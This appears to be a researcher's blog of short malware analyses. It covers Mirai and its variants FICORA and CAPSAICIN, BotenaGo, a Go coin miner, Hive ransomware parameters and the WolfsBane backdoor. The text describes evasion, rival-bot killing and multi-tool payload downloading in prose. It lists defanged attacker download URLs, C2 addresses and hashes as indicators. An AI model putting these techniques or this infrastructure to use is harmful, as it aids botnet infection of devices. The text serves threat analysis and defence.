Mirai: An IoT DDoS Botnet How To Protect and Disguise Itself As Aggressive Attacker Analysis

 

Summary

Since 2016, when the Mirai source code was published, similar family botnets have emerged; more and more botnets have appeared. and IoT security has become a big challenge. That makes me care about botnet development and do research. Recently, Mirai attracts me again; I like to do analysis with it in a different way, so here it is.

 

Analysis

 

Protect and Disguise Itself

Like any other malware that does anti-debug from an analyst, Mirai uses the function anti_gdb_entry with one parameter to monitor gdb debug. If it discovers debugging, it executes the function unlink to delete itself and tries to prevent the watchdog from rebooting the device and keep itself running all the time, not offline.

Figure1-anti-debug, delete self and keeping running

 

Using a random string which the length can be either 12, 16, 20, or 24 as name of processes and execute util_strcpy function for copying string to args[0] and hiding a real name.

Figure2-Hide argv0

 

Using a random string with the number from 12 to 32 as the name of processes and executing the prctl function for changing the name of a process.

Figure3-Hide process name

 

 

Aggressive Attacker

Mirai kills known anime botnet processes in order to ensure it is the only executing on the victim host or compromise IoT devices.

Figure4-kill anime botnet

 

Mirai kills telnet, SSH, and HTTP services and prevents them from restarting and also prevents the other botnet's attempt.

Figure5-kill tcp/23 telnet

 

More advanced technology is used to check and kill the other malware binary in memory.

Figure6 scan in memory for binary

 

 

End.

Botnet continue to exploit vulnerabilities and FICORA botnet analysis

 

Summary

 

Back to December 26, 2024, FortiGuard Labs noticed a new variant called "FICORA" frequently spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands like downloading malware, brute force attacks, and DDoS flooding attacks on victim hosts.

 

Analysis

 

Why call the botnet named “FICORA”?

FICORA bot named from malware inside strings

Figure1- special strings

 

The shell script executes multiple strategies, such as wget, ftpget, tftp, and curl, to get malware FICORA.

Figure2-downloader with multiple strategies for get malware

 

 

The shell script kills all processes with the same file extension.

Figure3-downloader with kill -9 command

 

The shell script tries to find and kill any process containing the keyword “dvrHelper,” which can decode from hex to strings; below is a small part.

Figure4- malware inside hexadecimal script

Figure5- malware inside script with plain text

 

Yeah, as you know, like “Mirai” family Botnet loader binary bin file that contains the keyword “dvrHelper” as follows.

Figure6-loader bin like dlr.arm7

 

Brute force attacking in “FICORA” with embedded username and password list.

Figure7-  Brute force attack function with embedded username and password

 

 

And default username and password embedded in malware, FICORA and Mirai are very similay.

 

Figure8-username and password compare

 

FICORA and Mirai have multiple similary structure.

 

Figure8-structure compare

Figure9-structure compare

 

 

Compare the malware “FICORA” to Mirai, It can be identified by its similar architecture like “attack_method_udpplain”, the similarity is 53% and the confidence is 64%.

Figure10-DDoS in udp

 

IOCs

 

downloader md5 cb9f5c8892bffc28f6c12f11d60f5c92

downloader URL

hxxp://103[.]149[.]87[.]69/multi
hxxp://103[.]149[.]87[.]69/la.bot.arc
hxxp://103[.]149[.]87[.]69/la.bot.arm
hxxp://103[.]149[.]87[.]69/la.bot.arm5
hxxp://103[.]149[.]87[.]69/la.bot.arm6
hxxp://103[.]149[.]87[.]69/la.bot.arm7
hxxp://103[.]149[.]87[.]69/la.bot.m68k
hxxp://103[.]149[.]87[.]69/la.bot.mips
hxxp://103[.]149[.]87[.]69/la.bot.mipsel
hxxp://103[.]149[.]87[.]69/la.bot.powerpc
hxxp://103[.]149[.]87[.]69/la.bot.sh4
hxxp://103[.]149[.]87[.]69/la.bot.sparc

 

FICORA md5 233A1A71307FD7CA5946D90D6977E97A

 

Conclusion

It is very high confident that the malware “FICORA” can be belong to a variant of the Mirai family malware. It can be identified by its multiple similar architecture.

 

End.

Botnet continue to exploit vulnerabilities and CAPSAICIN botnet analysis

 

Summary

Back to December 26, 2024, FortiGuard Labs noticed a new variant called "CAPSAICIN" frequently spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands like downloading payloads, killing botnets processes, DDoS attacking, telnet scanning, and installing binaries in victim hosts.

Analysis

 

Why call the botnet named “CAPSAICIN”?

CAPSAICIA bot named from malware inside strings

Figure1-special strings

 

 

The PRIVMSG function implies that “CAPSAICIN” includes more functions and relative commands as follows.

Figure2-command for “CAPSAICIN”

Like the other botnet, “CAPSAICIN” kills known botnets processes to ensure it is the only botnet executing on the victim host.

Figure3-pkill -9 known bots

 

AK47SCAN: Ak47telscan for cracking telnet using open-source projects as follows.

Figure4-ak47telscan execute

 

How to get a payload from a remote machine?

Supporting multiple ways like wget, tftp, and ftpget for payload download.

Figure5-multiple ways for payload download

 

How many ways is “CAPSAICIN” doing DDoS attacking?

DDoS supports multiple methods like STD, UNKNOWN, HTTP, HOLD, JUNK, BLACKNURSE, and DNS.

Figure6-DDoS flooding multiple ways

C2 server 45[.]86[.]86[.]60

Figure7-C2

 

 

IOCs:

C2 45[.]86[.]86[.]60

CAPSAICIN 61e7d18a4efdd3273fe436a0d66da732

Payload download link http[:]//pirati.abuser.eu/yak.sh

End.

‘BotenaGo’ Malware Targets Multiple Routers with 30+ Exploit Functions and Go Reversing Analysis

 

Summary

 

Back to November 11, 2021, AT&T Alien Labs had found new malware written in the open-source programming language Golang. Deployed with more than 30 exploits, it had the potential of targeting millions of routers and IoT devices. After that, LevelBlue Labs first published research on their discovery of new malware written in the open-source programming language Golang to GitHub.

But this blog does not go to open-source analysis and still does Go reversing.

Recently, you know lots of malware turned to Go field, which is the new challenge.

Malware itself Key.

1. 30+ different exploit functions and different router versions

2. Support backdoor with telnet and reverse shell httpd

3. Not found DDos attack module inside

4. Plain text string in malware

 

Analysis

 

As you know, BotenaGo malware is the type of botnet, but when we face a new malware, we have to analyze what happened in the malware itself.

Obviously, lots of infection functions to vendors like Dlink, ZTE, Tenda, RealTek, and so on; there are some different versions, such as DlinkTwo, DlinkThree, DlinkFour, DlinkFive, DlinkSix, DlinkSeven, and DlinkEight. It told us the attacker was very familiar with different router vendors and deeply researched different versions.

Figure1- infection function to vendors

 

Those 30+ different exploit functions are relative to the GET and POST methods, which are the attacking paths. the CVE vulnerability that comes from those strings.

Figure2- GET strings for exploit functions

Figure3- POST strings for exploit functions

 

The main_scannerInitExploits structure is very clear, and similarly for each infect function to Add and Change.

Figure4- infect functions are similarly

Support backdoor with telnet loader and reverse shell loader

Figure5- backdoor loader

It creates a shell with port in hex 7AB4h (31412) and listens.

Figure6- shell port 7AB4h

 

One of the malware payload download links is as follows.

Figure7- payload download link

 

The other IOCs can collect from plain text strings with the key “wget” search.

 

End.

CoinMiner embedded lots of vulnerabilities to exploit

 

This coinMiner family is very classical, which the sample itself embedded lots of vulnerabilities to exploit, yeah, there are N-day. I just introduced one of them with static analysis; here we go.

The sample

(SHA256: 128452242b0ff64f746759e106ce84b998c0b7807380a1f50975ceb8eada430e)

The sample packed with the packer: UPX (3.96).

Figure 1 – packer:UPX(3.9.6)

Try the UPX tool to unpack, and the language is Go. Yeah, the Go language is so popular with malware development.

Figure 2 – the sample compiler with Go

Ok, let’s move to static analysis. Good luck!

Some function name strings like “shell_exploit” were very attractive.

Figure 3 – shell_exploit_* strings

 

Here, choosing “_b42207_” randomly for analysis.

Figure 4 – shell_exploit_ptr_b42207_*

 

In the function “shell_exploit__ptr_b42207_run,” you can find an interesting and key string: “/securityRealm/user/admin/.”

Figure 5 – CVE-2018-1000861: key strings

The complete strings are as follows:

Figure 6 – CVE-2018-1000861 complete string for EXP

It is CVE-2018-1000861, which is the Jenkins remote command injection.

Of course, the other vulnerabilities can check it out like that; lots of work needs to be done until you can get a table list.

 

End.

Hive ransomware command-line parameters analysis

 

Back to July 22, 2022, I noted that Hive ransomware gets upgrades in Rust by Microsoft Threat Intelligence (Hive ransomware gets upgrades in Rust | Microsoft Security Blog).

The report mentioned that Unlike in previous variants where there was a ‘help’ menu, in the new variant, the attacker must know the parameters beforehand. Since all strings are encrypted, it makes finding the parameters challenging for security researchers.

Getting the command-line parameters is very challenging for beginners, but recently I wanted to challenge myself.

I choose the sample (SHA-256: 33744c420884adf582c46a4b74cbd9c145f2e15a036bb1e557e89d6fd428e724) to debug.

The sample won’t continue its execution, but it will also tell key information to the analyst.

The first thing is the sample has to handle input from the user.

the second thing it prints is an error

Figure 1 – Without a username and a password, the sample won’t continue its execution

The sample uses the function “GetCommandLineW” to get command-line parameters.

Figure 2 – “GetCommandLineW” for getting paramters

Beginning before we change the command line first with any short string like the “xx,” which makes running error

Figure 3 – change the command line with appending string “xx”

And now let’s debug using “GetCommandLineW” to set a breakpoint and make it run there as follows:

Figure 4 – set breakpoint with GetCommandLineW

From here, we will debug step by step and be more patient, and finally we will find all parameters like –da, –wmi, and –min-size.

Figure 5 – -da parameter

Figure 6 – -wmi and –min-size parameter

Different variants have different parameters.

End.

Unveiling Gelsemium’s (毒狼草) Linux backdoor WolfsBane

 

Back to Dec 19, 2024, I noted that ESET researchers analyzed previously unknown Linux backdoors (Unveiling WolfsBane: Gelsemium’s Linux counterpart to Gelsevirine).

I was attracted by the part of the WolfsBane backdoor, stored in a file named udevd, which embedded libMainPlugin. so, libUdp.so and libHttps.so.

I tried to extract those above three so files, and now let’s do it.

We need the malware sample named udevd, the hash sha1 0AB53321BB9699D354A032259423175C08FEC1A4.

Which came from the first archive, the hash sha1 f1df0c5a74c9885cb5934e3eee5e7d3cf4d291c0

udevd is an ELF file.

And search. so can see the above three so file module: libMainPlugin.so, libUdp.so, and libHttps.so

Let’s debug udevd with dbg, be patient, and finally jump here.

Yeah, we note that the key function is memcpy and the EmbeddedResource, which did deserialize the input archive and copy them to memory.

We just need to dump the three so files from memory.

First: find out the start address and how many bytes they are.

Second: write a Python script to dump as the following

Finally, we can successfully get libMainPlugin. so, libUdp.so and libHttps.so

The backdoor encrypts the libMainPlugin.So the library using the RC4 algorithm saves it to <work_directory>/X1l/data/gphoto2.

libUdp.so and libHttps.so provide C&C communications via UDP and HTTPS protocols.

 

End.